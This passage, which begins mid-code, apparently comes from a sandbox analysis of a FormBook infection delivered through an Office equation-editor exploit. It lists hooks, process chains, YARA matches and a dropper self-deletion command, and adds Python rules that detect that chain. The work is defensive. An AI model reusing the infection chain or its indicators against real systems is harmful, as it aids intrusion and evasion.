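    """Fields identical across requests to different hosts: the path and any
    query parameter whose value never changes."""
    reports = [beacon_indicators(r) for r in raws]
    shared_params = set(reports[0]["params"])
    for r in reports[1:]:
        shared_params &= set(r["params"])
    paths = {r["path"] for r in reports}
    return {"hosts": [r["host"] for r in reports],
            "shared_path": paths.pop() if len(paths) == 1 else None,
            "shared_params": sorted(shared_params)}


if __name__ == "__main__":
    for raw in (FORMBOOK_REQ_1, FORMBOOK_REQ_2, BENIGN_REQ):
        r = beacon_indicators(raw)
        print(r["host"], r["score"], [k for k, v in r["flags"].items() if v])
    print(campaign_link([FORMBOOK_REQ_1, FORMBOOK_REQ_2]))
```

The score alone is a weak signal (plenty of embedded clients omit a User-Agent), so it is the combination that matters: an interactive shell process such as explorer.exe issuing a header-less GET with a NUL body to a freshly resolved domain. The constant `wrx` value and path segment are the pivot for hunting the same build against other hosts in proxy logs.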


                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

                                                            Function Name | Hook Type | Active in Processes
                                                            PeekMessageA | INLINE | explorer.exe
                                                            PeekMessageW | INLINE | explorer.exe
                                                            GetMessageW | INLINE | explorer.exe
                                                            GetMessageA | INLINE | explorer.exe

                                                            Processes

                                                            Process: explorer.exe, Module: USER32.dll
                                                            Function Name | Hook Type | New Data
                                                            PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
                                                            PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE5
                                                            GetMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE5
                                                            GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE5


                                                            System Behavior

                                                            General

                                                            Start time:17:24:12
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase:0x13f420000
                                                            File size:1423704 bytes
                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:17:24:14
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:17:24:17
                                                            Start date:25/11/2021
                                                            Path:C:\Users\Public\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\Public\vbc.exe"
                                                            Imagebase:0x1090000
                                                            File size:739840 bytes
                                                            MD5 hash:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:17:24:20
                                                            Start date:25/11/2021
                                                            Path:C:\Users\Public\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\Public\vbc.exe
                                                            Imagebase:0x1090000
                                                            File size:739840 bytes
                                                            MD5 hash:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:17:24:23
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0xffa10000
                                                            File size:3229696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:17:24:53
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\raserver.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\raserver.exe
                                                            Imagebase:0x480000
                                                            File size:101888 bytes
                                                            MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            General

                                                            Start time:17:24:55
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\Public\vbc.exe"
                                                            Imagebase:0x4a120000
                                                            File size:302592 bytes
                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
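The process list above is the whole chain in order: WINWORD.EXE opens the RTF, the DCOM-launched EQNEDT32.EXE fetches and runs `C:\Users\Public\vbc.exe`, that .NET loader starts a second `vbc.exe` which is hollowed with the native FormBook payload (the report's "Programmed in" field flips from .NET to C/C++ between the two instances), code is injected into explorer.exe, raserver.exe is spawned as the persistent host, and cmd.exe finally runs `/c del "C:\Users\Public\vbc.exe"` to remove the dropper. The following checks are an added example, not part of the report: they encode the report's own signatures ("Office equation editor starts processes", "Execution from Suspicious Folder", "EQNEDT32.EXE connecting to internet") plus the self-cleanup step as rules over a process-creation log. The event list is constructed from the report's process entries; PIDs and parent links are assumed because the report shows neither, and explorer.exe is placed under the hollowed vbc.exe as a logical parent to reflect the injection the report describes.

```python
"""Process-chain checks for the System Behavior section above.

Added example, not part of the report. EVENTS is a constructed process-creation
log (Sysmon Event ID 1 style) rebuilt from the process list in the report;
PIDs and parent links are assumed because the report shows neither. The
report describes code injection into explorer.exe, so explorer.exe is placed
under the hollowed vbc.exe as a logical parent. NET_EVENTS is rebuilt from
the HTTP session table.
"""
import ntpath
import re

OFFICE = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"

EVENTS = [  # pid, ppid, image, command line (pid/ppid values are assumed)
    {"pid": 1000, "ppid": 900, "image": OFFICE, "cmdline": f'"{OFFICE}" /Automation -Embedding'},
    {"pid": 1100, "ppid": 900, "image": EQNEDT, "cmdline": f'"{EQNEDT}" -Embedding'},
    {"pid": 1200, "ppid": 1100, "image": VBC, "cmdline": f'"{VBC}"'},
    {"pid": 1300, "ppid": 1200, "image": VBC, "cmdline": VBC},
    {"pid": 1400, "ppid": 1300, "image": r"C:\Windows\explorer.exe", "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 1500, "ppid": 1400, "image": r"C:\Windows\SysWOW64\raserver.exe", "cmdline": r"C:\Windows\SysWOW64\raserver.exe"},
    {"pid": 1600, "ppid": 1500, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": f'/c del "{VBC}"'},
]
NET_EVENTS = [{"pid": 1100, "image": EQNEDT, "dst": "198.46.199.153", "dport": 80}]

# Only the directory seen in this report is listed; extend for your estate.
SUSPICIOUS_DIRS = ("c:\\users\\public\\",)
DEL_RE = re.compile(r'/c\s+del\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events, net_events) -> list:
    """Return (rule, detail) pairs for the behaviours the report flags."""
    by_pid = {e["pid"]: e for e in events}
    known_images = {e["image"].lower() for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        # "Office equation editor starts processes" (CVE-2017-11882 / CVE-2018-0802 pattern)
        if parent and basename(parent["image"]) == "eqnedt32.exe":
            hits.append(("equation_editor_child", e["image"]))
        # "Execution from Suspicious Folder" / "Drops PE files to the user root directory"
        if e["image"].lower().startswith(SUSPICIOUS_DIRS):
            hits.append(("exec_from_public_dir", e["image"]))
        # cmd.exe deleting the image of another observed process: dropper self-cleanup
        if basename(e["image"]) == "cmd.exe":
            m = DEL_RE.search(e["cmdline"])
            if m:
                target = (m.group(1) or m.group(2)).lower()
                if target in known_images:
                    hits.append(("observed_image_deleted", target))
    for n in net_events:
        # "EQNEDT32.EXE connecting to internet": the equation editor has no business online
        if basename(n["image"]) == "eqnedt32.exe":
            hits.append(("equation_editor_network", f'{n["dst"]}:{n["dport"]}'))
    return hits


if __name__ == "__main__":
    for rule, detail in detect(EVENTS, NET_EVENTS):
        print(f"{rule:28} {detail}")
```

Two of these rules fire before any payload runs: EQNEDT32.EXE opening a socket and EQNEDT32.EXE spawning a child both happen within seconds of the document being opened, ahead of the hollowing, the explorer.exe injection and the beacons. The deletion rule deliberately matches any previously observed image rather than walking the parent chain, because injection breaks the parent link (explorer.exe is not really a child of vbc.exe) and a tree walk would miss it.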
